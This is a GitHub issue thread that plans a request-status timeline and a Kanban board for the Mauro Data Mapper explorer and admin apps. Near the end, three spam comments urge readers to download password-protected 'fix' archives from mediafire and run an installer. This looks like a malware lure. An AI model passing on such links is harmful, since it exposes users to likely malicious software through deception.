### ISSUE TITLE
Enhance visualisation of data

### ISSUE THREAD

**Issue by NigelPalmer** [MauroDataMapper/mdm-explorer#425]
# Target
The MDE and SDE shall be updated with dashboards, tables and graphical representations of data to give users a clear view of all data they are allowed to access and the relationships between those different data items.

# Approach 
Work with OUH to define the exact data representations that are required and implement those data representations.

The following two areas of enhancement have already been identified:
- **Request status timeline:** Design a simple timeline that simply and clearly shows the requests progress through the request status workflow. The branching of the workflow will need to be considered, and the best way that this is presented. Icons to represent each step should be used on the timeline. Investigate if there are any existing angular components that will fulfil this.
- **Kanban board:** Identify any existing open-source Angular Kanban component and integrate this into the SDE administration application and configure it for request management. The Kanban board may allow for requests to be moved around the workflow.

### Kanban Board
This is a free Kanban board implementation, but it is quite old: https://github.com/DlhSoftTeam/Angular-Kanban
This is source code for creating your own Kanban board: https://www.genuitec.com/create-kanban-board-angular-4/

Investigate the options and assess which would provide the fastest solution and would be the easiest to maintain and adapt moving forwards.

# Description

## Request status timeline
Design a simple timeline that simply and clearly shows the requests progress through the request status workflow. 
This timeline will appear in:
- **MDM-Explorer** -> Requests Page  -> request popup: inside the popup, on the top, just below the title
- **SDE-Admin-ui** -> Request Page (it could be showed as KANBAN (new feature) or as LIST
  In both cases the timeline will appear within the request popup: inside the popup, on the top, just below the title

## Kanban Board
Design a simple (open-source) Angular Kanban component to be integrated into the SDE administration. The kanban will be used as 
better visualisation tool for the admins giving them immediate view of all available requests and what status they are.
Drag-and-Drop functionality is not required at this stage (probably won't in the future either as well established that Admins must open the request and review any changes before moving forward)

# Planning and Requirements

Initial tasks set to start discussions and planning:
- MauroDataMapper/sde-core#228
- MauroDataMapper/mdm-explorer#436
- MauroDataMapper/sde-admin-ui#191

# List of Tasks/Requirements

## Timeline status representation
- [x] MauroDataMapper/sde-resources#130
- [x] MauroDataMapper/mdm-explorer#448
- [x] MauroDataMapper/sde-admin-ui#198

These are placeholder that need to be turned into proper tasks once everything is defined from corresponding Plannings:

## Kanban representation
- [x] MauroDataMapper/sde-resources#162
- [x] MauroDataMapper/sde-admin-ui#202
- [x] MauroDataMapper/mdm-explorer#475

Display:
- Sde-Admin-UI: Create a page to display the visual display, including styling and navigation links from the requests page
                           Kanban display should not replace the existing list but it will be a second option.
   ==> there will be something letting admins to select which view they would like to use

- Sde-Admin-UI: Create a board component that consumes the state flow representation produced by the service and shows a grid with column headers being the available states
- Sde-Admin-UI: Add the ability for the above board component to call a list of all requests.
- Sde-Admin-UI: Create a card type component that receives a request from the parent component. That card will display information on the request including: type, current state and other info (todo: what other info?)
- Sde-Admin-UI: modify the board component to display the card component in the right column according to its state. This card should link to the request page for a component when clicked
- Sde-Admin-UI: Consider hooks to refresh the board when a request changes state externally
- Sde-Admin-UI: Explore visual tools such as grouping, filtering and managing of visible cards and states.
- Sde-Admin-UI: Explore what actions could be taken on the board for not allowing Drag-and-Drop actions.

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by giovannaOCC** [comment]
All Done!
